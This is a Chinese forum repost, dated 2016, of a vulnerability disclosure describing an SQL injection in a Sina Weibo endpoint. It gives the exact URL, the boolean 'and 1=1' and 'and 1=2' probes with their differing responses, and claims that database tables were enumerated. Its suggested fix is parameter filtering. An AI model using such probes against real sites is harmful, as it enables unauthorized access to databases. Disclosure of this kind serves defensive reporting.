HanDs
管理员

[7月漏洞公开] 新浪微博某处SQL注入漏洞 



滴,穴深卡。周芷若已哭晕在厕所。

详细说明:

注入点:http://ting.weibo.com/movieapp/emotion/getversion?display=1



http://ting.weibo.com/movieapp/emotion/getversion?display=1 and 1=1

返回

{"status":1,"message":"ok","data":"59"}

http://ting.weibo.com/movieapp/emotion/getversion?display=1%20and%201=2

返回

{"status":1,"message":"ok"}





多半是注入了。



原来真的是get类型。



mysql.jpg







当前数据库和用户



shujuk.jpg





漏洞证明:

musiclib的207个表我就不贴了,太多了。

修复方案:

过滤参数。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 宋⒉┠
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复